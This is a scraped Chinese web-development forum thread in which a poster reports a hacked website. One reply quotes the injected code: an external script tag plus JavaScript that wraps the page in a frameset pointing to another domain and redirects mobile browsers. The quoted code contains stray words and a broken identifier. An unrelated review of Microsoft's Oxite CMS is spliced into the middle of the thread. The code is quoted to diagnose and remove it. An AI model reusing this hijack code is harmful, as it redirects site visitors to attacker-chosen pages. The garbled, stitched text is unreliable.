网站被黑,审查元素和源码不一样

咸魚先生 2016-02-19 05:45:18
删除iframe后,还是不能恢复
...全文
788 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
丰云 2016-02-23
  • 打赏
  • 举报
回复
这是个好心的黑客,帮你检测系统漏洞了
cheery_an 2016-02-23
  • 打赏
  • 举报
回复
还留了电话号码。。。。
Sugar_383329144 2016-02-20
  • 打赏
  • 举报
回复
首先检查你网站服务器上面有没有异常,如果没有的话,看起来像是被劫持了。 发出的这几张截图不足以进一步定位分析问题。至少把网站url贴出来?
KK3K2005 2016-02-20
  • 打赏
  • 举报
回复
我觉得格式化重新装下服务器吧 然后吧安全工作 先做做好
留校_察看 2016-02-20
  • 打赏
  • 举报
回复
把地址发出来就知道了
Go 旅城通票 2016-02-20
  • 打赏
  • 举报
回复
js文件被修改了,自己检查漏洞了
functionsub 2016-02-19
  • 打赏
  • 举报
回复
头部这行JS拿掉: <script language="javascript" type="text/javascript" src="http://3g.wangluoyun.cn/templets/2014/js/tiyan.js" ></script> 如果不能拿掉的话看下面:
var juesha_pc_domain = "http://www.wangluoyun.cn/index_oldd.html";	//PC站网址
var juesha_wap_domain = "http://3g.wangluoyun.cn/index_oldd.html";		//手机站网址
var juesha_51la = "/51la.html";						//51啦可正常统计,请将代码添加到51la.html
document.writeln("<frameset cols=\"100%\"><frame src=\""+juesha_pc_domain+"\" /><frame src=\""+juesha_51la+"\" /></frameset>"); // 这行代码在作怪
function browserRedirect() { 
var sUserAgent= navigator.userAgent.toLowerCase(); 
var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; 
var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; 
var bIsMidp= sUserAgent.match(/midp/i) == "midp"; 
var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; wang
var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; 
var bIsAndroid= sUserAgent.match(/android/i) == "android"; 
var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; 
var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; 
if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAnd
roid || bIsCE || bIsWM) { 
window.location.href= juesha_wap_domain; 
} else { 
} 
}
browserRedirect();

早在12月5号,微软就发出了将要发布开元的CMS系统的消息,正如微软官方所说,我们在12月6号也确实下载到了Oxite 的程序源码。实在是强大,网上赞扬的声音此起彼伏,我今天也粗略的体验了一把。 我的操作系统使用的是win server 2003 sp2 ,据Oxite Code Plex 官方的消息是可以在win server 2003 上跑得,但是我再安装sql server 出现某个应用没安装的问题,所以呢,严格的说,我也没有真正的在服务器上假设成功。姑且就让他在 VISUAL WEB DEVELOPER 里调试吧,如下,让我们一起来欣赏下漂亮的Oxite吧! 其实“开源”两个字通常和微软扯不上太多的联系,不过,这次微软却出乎意料的放出了首款开放源码的博客/CMS内容管理系统,Oxite。软件使用Microsoft Public License (MS-Pl)授权方式,而且源代码完全公开。Oxite兼容WEB标准,并具有高度扩展性,可用来设计博客或其它类型的网站平台。用其架设博客平台可以拥有博客发布,引用通告、匿名评论和评论审查等博客系统基本功能,此外还可对评论进行管理,任何页面均可做为RSS源输出,并带有一个Web管理面板,支持MetaWebLog API。不过,就现在所知道的情况,Oxite的最大缺陷在于其使用了微软的SQL Server数据库,当然,开发者也可以用其他数据库方案取而代之。这一点可以作为Oxite推出的一方面原因吧,权且当是起到一个抛砖引玉的作用。 微软于2008年12月6日在自己的开源社区CodepPex发布了首款内容管理系统oXite,目前为Alpha版本,大家可以Google一下oXite,很容易的就可以找到很多关于oxite的介绍,目前oXite.com/oXite.cn/oXite.com.cn等域名或官方或抢注全部没有了,说明这个系统在很短的时间内就确实引起了很多朋友的关注,作为微软的这一次开发,根据目前的反应来看,可以认为是相当成功了。 在准备体验Oxite时, 你需要看一下下面的资料。 一、oXite的开发环境配置 详细的大家可以上官方网站看看 :官方介绍 主要是: Visual Studio 2008,用Vs2005是打不开项目的。 Sql Server 2005 or 2008 Asp.net MVC Beta,不装也打不开项目。 单看上面所涉及到的这几个条件,目前很多主机服务商还不能满足要求,也就是先在自己的机器上看看了,环境配置好了之后,基本上就可以用Vs2008打开了,注意打开那个Oxite.VWDExpress.sln,我试着打开Oxite.sln失败了。打开成功后设置oxiteSite为启动项,直接F5运行就可以,数据库是不需要额外去配的,直接在项目中oxite.database.mdf。在刚开始的时候由于Sql Server 没有装好,所以在昨天晚上没有调试成功,今天把Sql Server 重新装了一下,总算是成功了。 这时候我们就可以看到默认的博客界面了,另外Mix Online这个网站本身就是使用oXite架设的,大家也可以由此看到一些oXite在Web前端的一些东西了。 在用VISUAL WEB DEVELOPER打开项目时,由于默认的数据库服务器没有启动,所以,这个时候数据库是连接不上的,当然你在调试的时候也就会开到错误的提示了。 在你一切准备工作都做好之后,你就可以开始观看这个强大的Blog界面了 。 这是在成功看到的欢迎界面。 这是里面的一个测试页面 这就是管理的页面,不过相比看起来的确是简单的很多。 总体上那个说来,我们从整个过程中可以体会到这一点,Oxite下载很多地方还可以供大家继续发挥。相对来说,oxite确实是个轻量级的,压缩包才1M多点,解压后14M左右,不像微软自己的Sharepoint那么庞大。 前端支持很好,代码输出比较自主,不想Sharepoint那样,一个core.css就5000多行。 项目默认加入了jQuery/Yui/tag/rss/Pingback/trackback/Gravatar/UrlRewrite等流行元素。当然,毕竟是个Alpha版本的东西,或许是没太熟悉oXite的配置,或许是微软想像WP一样,更多的功能留给大家自己去发挥。 如此,这次的Oxite 我们就算是体验了,不过这只是粗略的带着钦羡的目光在看待一个完美的系统,更多的东西还待大家来发掘。 毕竟,oxite 也不是供简单的只是想用来假设个网站的人来用的,oxite 现在主要是针对vw开发者每而开源的,我就已我作为一个使用者的角度来看待这个系统,有以下看法: 1、网站管理功能过于简单,登录进去的管理首页和未登录几乎是一模一样的,只是右侧的日志存档列表换成了Tasks:Create Post/Create Page。看到的管理后台,就仅此两项,有点惊讶。 2、Create Page成功后不能直接出u了……现在首页的顶部链接中,我没找到我新建的页面跑哪里去 3、用户配置问题,后台非常的简单,所以用户配置不知道是使用asp.net默认的站点管理功能来做的,还是需要补充开发用户模块的功能,系统默认的管理员数据是写在oxite_user表里的,而且管理员的Gravatar对应的邮箱也是存在这个表里边的,搞得我找了半天都不知道在哪里修改那个外国佬的Gravatar头像…… 4、网站的基本设置,主要是通过web.config和直接写入数据库来的。web.config中我大致瞄了一下,包含了出数据库连接等基本要素外,还加了一些本应该开发在后台管理功能中的站点名称、网站域名、语言设置、时区设置、Gravatar参数等。

87,921

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧